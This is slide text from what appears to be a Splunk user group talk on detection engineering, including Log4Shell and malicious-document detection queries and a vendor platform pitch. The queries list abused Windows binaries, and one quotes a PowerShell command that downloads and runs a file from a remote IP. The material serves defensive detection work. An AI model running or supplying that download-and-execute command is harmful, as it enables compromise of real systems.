  • 13. Confidential Threat Scenario Entity ‘X' Entity ‘X' Entity ‘X' + + Threat Identifier Event ID = “1234” AND (Process Name = “XYZ” OR Process Name = “ABC”) Events of Interest Event of Interest “A” AND (60 Minutes) Event of Interest “B” AND (5 hours) Event of Interest “C” Threat Identifiers >> EOI >> Threat Scenarios 13 Multi-stage Detections 13
  • 15. Confidential What Is Detection Engineering Webster’s Dictionary Defines Detection Engineering As… Query Detection Threat Scenario Visualization Dashboard Report SIEM Content • Everything Is A Query • Use Case != SIEM Content • This Is A Use Case Business & Threat Understanding Data Understanding 15 15 The Goal of a Detection Engineer In other words…
  • 16. Confidential Diving Even Deeper Diving Even Deeper Collect Detect Analyze Respond Security Analytics Lifecycle Evaluation Modeling Data Preparation Data Understanding Business & Threat Understanding Research • Gather • Interpret • Hypothesize Develop • Test • Document • Deploy Maintain • Update • Tune Evaluation Deployment 16 DE as part of the Security Analytics Lifecycle 16
  • 17. Confidential Research Data Preparation Data Understanding Business & Threat Understanding Research • Gather • Interpret • Hypothesize • Which Threats Are Relevant To The Business? • What Is That Threat? • How Does It Work? • What Would It Look Like For Us? • What Data Points Can I Use To Identify The Threat? • Do We Have The Data In Our Environment? • Do We Have The Data In Our SIEM? • Is The Data Adequately Verbose? • Is The Data Adequately Parsed? 17 Research 17
  • 18. Confidential Building and Testing Modeling Develop • Test • Document • Deploy • How Do I Translate My Hypothesis Into a Query? Deployment • How Do I Deploy & Manage My Detections At Scale In A Large And/Or Distributed Environment? Evaluation • Does My Hypothesis Hold Up? • Is It Accurate? • Is It Precise? • Is It Highly Actionable? 18 Develop 18
  • 19. Confidential A Hands-on Example A Hands On Example https://www.lunasec.io/docs/blog/log4j-zero-day/ https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b https://blog.qualys.com/vulnerabilities-threat-research/2021/12/14/log4shel l-exploit-detection-and-response-with-qualys-multi-vector-edr Web Traffic → String “jndi” Process Monitoring → Parent Process “Java” + Child Process ”?” "${jndi" OR (TERM(j) TERM(n) TERM(d) TERM(i)) OR "lower" OR "upper" OR (TERM(jn) TERM(DI)) OR (TERM(J) TERM(ndi)) OR (TERM(jnd) TERM(i)) OR TERM(jndi) |regex _raw="(?i)${.*?j.*?n.*?d.*?i.*?:.*?://.*?}" (TERM(EventCode=4688) OR "<EventID>4688<" OR Type=Process) "java.exe" ("powershell.exe" OR "cmd.exe" OR "AppInstaller.exe" OR "Bitsadmin.exe" OR "CertOC.exe" OR "CertReq.exe" OR "cmdl32.exe" OR "Control.exe" OR "Cscript.exe" OR "Desktopimgdownldr.exe" OR "Diantz.exe" OR "Esentutl.exe" OR "Eventvwr.exe" OR "Expand.exe" OR "Extrac32.exe" OR "Findstr.exe" OR "Finger.exe" OR "Ftp.exe" OR "GfxDownloadWrapper.exe" OR "Hh.exe" OR "IMEWDBLD.exe" OR ... TRUNCATED 19 Research & Develop 19
  • 20. Confidential Maintain • Update • Tune Evaluation • Does My Hypothesis Still Hold Up? • Is It Accurate? • Is It Precise? • Is It Highly Actionable? Deployment • How Do I Deploy & Manage My Detections At Scale In A Large And/Or Distributed Environment? 20 Maintain 20
  • 21. Confidential Example with Details A Hands On Example TERM("EventCode=4688") (TERM("powershell.exe") OR TERM("cmd.exe") OR TERM("wscript.exe") OR TERM("cscript.exe")) ((TERM(Microsoft) TERM(Office)) OR TERM(WINWORD.EXE) OR TERM(EXCEL.EXE) OR TERM(POWERPNT.EXE) OR TERM(MSACCESS.EXE) OR TERM(OUTLOOK.EXE) OR TERM(VISIO.EXE) OR TERM(WINPROJ.EXE) OR TERM(pdf)) | regex "(?i)(Microsoft Office)|(WINWORD.EXE)|(EXCEL.EXE)|(POWERPNT.EXE)|(MSACCESS.EXE)|(OUTLOOK.EXE)|(VISIO.EXE)|(WINPROJ.EXE)|(AcroRd32.exe)|(Acrobat.exe)|(FoxitPhantomPDF .exe)|(FoxitReader.exe)" Primary Fields of Interest: • Parent Process • Child Process Secondary Fields of Interest: • User • Host | stats count(avl_use_case_title) by parent_process_name, process_name, process | stats count(avl_use_case_title) by user | stats count(avl_use_case_title) by host `avl_get_anvilogic_data` source="avl:t*" avl_use_case_title="Malicious Document Execution (Demo)" process!="powershell.exe IEX ((new-object net.webclient).downloadstring('http://154.33.121.14/readme.zip'))" 21 Maintain 21
  • 22. 22 Putting it all together in a “Scenario”
  • 23. Confidential Capability Capacity Time/Resources "I Don't Have Time" Skills & Experience "I Don't Know How" Detection Engineering Fundamental Challenges Time/Resources "I Don't Have Time" Skills & Experience "I Don't Know How" Time/Resources "I Don't Have Time" Skills & Experience "I Don't Know How" Evaluation Modeling Data Preparation Data Understanding Business & Threat Understanding Research • Gather • Interpret • Hypothesize Develop • Test • Document • Deploy Maintain • Update • Tune Evaluation Deployment 23 Fundamental Challenges 23
  • 24. Detection is critical but expensive, slow, & manual Analytic Layer Logging Layer ● Highly manual ● FTEs for tuning and health monitoring ● No versioning or validation Detection Maintenance ● Tracking priorities is manual ● Hard to keep up with MITRE ● Difficult to identify gaps ● No way to track progress Detection KPIs 24 ● Mostly manual / many tools ● Threat intel is expensive ● Time to detect is slow ● Minimal correlation Detection Engineering ● Expensive ● Difficult to maintain ● Vendor Lock in Centralized Data Stores ● Need cost effective options ● Hybrid models brewing ● SOC has no access More & more data…
  • 25. Go from threats to detections in minutes Immediate value Streamline your detection process ● Purple Team & Detection Armory Service ● Detection lifecycle management platform Detection Engineering Faster Deployment ● Tuning & Health Insights ● Remediation recommendations ● Hunting Insights Detection Co-Pilot Automate Maintenance ● MITRE ATT&CK coverage ● Data feed coverage ● Improvement framework Maturity Scoring Continuously Assess Bring Your Own Security Data Lake 25
  • 28. © 2023 SPLUNK INC. Dennis Morton Principal Consultant | Arcus Data Edge Hub and AI Assist Demo
  • 29. © 2023 SPLUNK INC. ● Topic requests for next time? ● Apply to be a User Group leader ● Drop suggestions or offers to speak to the #pnw channel in the UG slack Wrap up
  • 30. © 2023 SPLUNK INC. Thank You!